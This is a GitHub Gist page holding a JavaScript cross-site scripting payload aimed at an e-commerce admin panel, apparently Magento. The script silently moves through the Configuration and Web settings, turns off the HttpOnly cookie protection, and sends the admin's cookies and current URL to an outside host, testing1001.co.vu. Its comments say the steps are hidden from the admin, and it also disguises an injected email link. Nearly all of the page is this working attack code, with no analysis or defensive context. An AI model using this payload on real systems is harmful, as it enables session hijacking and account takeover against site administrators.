-
-
Save ibrmora/d5405949029a3bc908a5487d158f4e28 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** Helpers */ | |
| function findLinkInSpan(spans, search) { | |
| for(i in spans) { | |
| if (spans[i].textContent.trim() == search.trim()) { | |
| return spans[i].parentElement.href; | |
| } | |
| } | |
| } | |
| /** Wait for the AJAX to stick the data into our target element */ | |
| var waitingTime = 3000; | |
| function exploitOrderPage() { | |
| /** Navigate the menu */ | |
| var nav = document.getElementById('nav'); | |
| var spans = nav.getElementsByTagName('span'); | |
| configLink = findLinkInSpan(spans, "Configuration"); | |
| /** Global for exploitConfigPage to use */ | |
| configPage = document.createElement('span'); | |
| configPage.display = 'None'; | |
| new Ajax.Updater(configPage, configLink, { | |
| method: 'get', | |
| onSuccess: function(){ | |
| setTimeout(function(){ | |
| exploitConfigPage(); | |
| }, waitingTime); | |
| } | |
| } | |
| ); | |
| } | |
| function exploitConfigPage() { | |
| var spans = configPage.getElementsByTagName('span'); | |
| var webConfigLink = findLinkInSpan(spans, 'Web'); | |
| /** Global for exploitWebPage to use */ | |
| webPage = document.createElement('span'); | |
| webPage.display = 'None'; | |
| new Ajax.Updater(webPage, webConfigLink, { | |
| method: 'get', | |
| onSuccess: function(){ | |
| setTimeout(function(){ | |
| exploitWebPage(); | |
| },waitingTime); | |
| } | |
| } | |
| ); | |
| } | |
| function exploitWebPage() { | |
| var select = webPage.getElementsBySelector('[id=web_cookie_cookie_httponly]')[0]; | |
| for(var o = 0; o < select.options.length; o++) { | |
| select.options[o].value = 0; //set it to the 'No' value easily | |
| } | |
| var form = webPage.getElementsByTagName('form')[0] | |
| //Submit it via Ajax using prototype so the admin doesn't know | |
| $(form).request({ | |
| onFailure: function(){}, | |
| onSuccess: function(t){ | |
| var logPage = document.createElement('span'); | |
| var evil = 'http://testing1001.co.vu?' + document.cookie + window.location.href; | |
| logPage.display = 'None'; | |
| new Ajax.Updater(logPage, evil, {method: 'get'}); | |
| } | |
| }) | |
| } | |
| /** On load we want to hide the weird email from the admin and steal! */ | |
| var anchors = document.getElementsByTagName('a') | |
| for(var i = 0; i < anchors.length; i++) { | |
| if(anchors[i] && anchors[i].href == 'mailto:') { | |
| anchors[i].textContent = 'therightname1@hotmail.com'; | |
| } | |
| } | |
| //GO! | |
| exploitOrderPage(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment